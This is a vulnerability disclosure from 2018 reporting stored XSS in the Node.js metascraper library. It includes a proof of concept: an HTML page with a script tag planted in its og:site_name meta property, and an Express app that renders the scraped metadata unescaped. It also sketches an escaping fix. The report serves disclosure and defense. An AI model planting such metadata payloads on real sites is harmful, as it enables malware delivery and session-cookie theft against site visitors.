Jan 25, 2018 - 9:27 p.m.

Node.js third-party modules: [metascraper] Stored XSS in Open Graph meta properties read by metascraper


0.001 Low




Hi Guys,

metascraper is vulnerable to stored XSS via Open Graph metadata when that metadata is used in HTML without any sanitization.


A library to easily scrape metadata from an article on the web using Open Graph metadata, regular HTML metadata, and series of fallbacks.


Due to the lack of HTML sanitization, it is possible to embed malicious code in any of the metadata read by metascraper. When the library reads such metadata, it performs no sanitization. If the output from metascraper is used directly in HTML, any HTML embedded in the metadata is executed in the context of the page that loads and renders it.
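
To make the mechanism concrete, here is a minimal sketch, assuming an application that interpolates scraped metadata into a template string in the same way as the PoC app in this report. The `renderUnsafe` helper and the sample `metadata` object are hypothetical stand-ins for real scraper output; no network request is made.

```javascript
// Hypothetical stand-in for the object returned by the scraper; the
// publisher value carries markup from an attacker-controlled og:site_name.
const metadata = {
  title: 'test article',
  publisher: '<script src=""></script>'
}

// Hypothetical helper: builds HTML by plain string interpolation,
// with no escaping of the interpolated values.
function renderUnsafe (meta) {
  return `<p>site title: ${meta.title}</p>\n<p>site publisher: ${meta.publisher}</p>`
}

const page = renderUnsafe(metadata)

// The markup from the metadata is now part of the page markup itself,
// so a browser would parse it as a real <script> element.
console.log(page.includes('<script src=""></script>')) // true
```

Nothing in the interpolation step distinguishes data from markup, which is why the value has to be escaped or sanitized before it reaches the template.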

Steps To Reproduce:

This part of the PoC represents the attacker

The attacker needs to inject malicious code into any Open Graph property.

  • create a website (I serve it via a static server) with the following content. Note the payload embedded in the og:site_name meta property:
<!doctype html>
<html xmlns:og="" lang="en">
<head>
    <meta charset="utf8">

    <meta property="og:description" content="The HR startups go to war.">
    <meta property="og:image" content="image">
    <meta property="og:site_name" content='<script src=""></script>'>
    <meta property="og:title" content="test article">
    <meta property="og:type" content="article">
    <meta property="og:url" content="">
</head>
</html>

  • save it as article.html in the root directory of the static server

  • create a malware.js file with the following content and save it in the same directory as article.html:

alert('Uh oh, I am very bad malware!')

Please be aware that the JavaScript file with malicious code can be served from ANY location. This particular location is used only for the PoC.

This represents an HTML page which can be “scraped” with metascraper

This part of the PoC represents a legitimate user and the attack itself

  • install metascraper and the required dependencies (got and express)
$ npm install metascraper got express
  • create an app (app.js) which uses metascraper to read website metadata. The app listens on port 8888; targetUrl is the target website from which the metadata is read:

const metascraper = require('metascraper')
const got = require('got')
const express = require('express')

// address of article.html on the static server
const targetUrl = ''

const app = express()

app.get('/scrap', function(req, res) {
    (async() => {
        // fetch the target page: response body plus its final URL
        const {
            body: html,
            url
        } = await got(targetUrl)
        // assumed call shape: metascraper({ html, url })
        const metadata = await metascraper({
            html,
            url
        })
        console.log(metadata)  // see returned metadata in console:
        /*
            { author: null,
                date: null,
                description: 'The HR startups go to war.',
                image: '',
                lang: 'en',
                logo: null,
                publisher: '<script src=""></script>',
                title: 'test article',
                url: '' }
        */
        // display content of metadata.publisher in the browser
        let __html = `
                <p>site title: ${metadata.title}</p>
                <p>site publisher: ${metadata.publisher}</p>
        `
        res.send(__html)
    })().catch(() => res.sendStatus(500)) // do not leave the request hanging on errors
})

app.listen(8888, () => console.log('Example app listening on port 8888!'))
  • run the above app:
$ node app.js
  • open the app's /scrap endpoint (port 8888) in a browser

  • the malicious JavaScript code embedded in the og:site_name site metadata is executed.


As we can see, our payload is rendered in the page source “as is”.
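
One way a consuming application could avoid rendering the payload “as is” is to escape every metadata value before interpolating it. The following is a minimal sketch under that assumption, not the fix adopted by the library; `escapeHtml`, `renderSafe`, and the `sample` object are hypothetical names introduced for illustration.

```javascript
// Hypothetical helper: replaces the five characters that are significant
// in HTML text and attribute values with their entity equivalents.
function escapeHtml (value) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }
  // null or undefined fields (such as author: null) become an empty string
  return String(value == null ? '' : value).replace(/[&<>"']/g, (ch) => entities[ch])
}

// Hypothetical replacement for the template used in the PoC handler:
// every interpolated value passes through escapeHtml first.
function renderSafe (meta) {
  return `<p>site title: ${escapeHtml(meta.title)}</p>\n<p>site publisher: ${escapeHtml(meta.publisher)}</p>`
}

// Sample values matching the metadata shown in the PoC console output
const sample = { title: 'test article', publisher: '<script src=""></script>' }

console.log(renderSafe(sample))
```

With this in place the browser displays the publisher value as literal text instead of parsing it as a script element. A templating engine that escapes by default would achieve the same effect.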


Supporting Material/References:

Configuration I’ve used to find this vulnerability:

  • macOS High Sierra 10.13.3
  • node 8.9.3
  • npm 5.5.1
  • curl 7.54.0

Wrap up

I hope this report helps keep the Node ecosystem safer. If you have any questions about the details of this finding, please let me know in a comment.

Thank you


Rafal ‘bl4de’ Janicki


Although this is quite hard to exploit in the wild, there is no doubt that such an attack is possible. It might lead to malware distribution, leaks of session cookies from infected websites, cryptocurrency miners running in users’ browsers, and many other attacks.
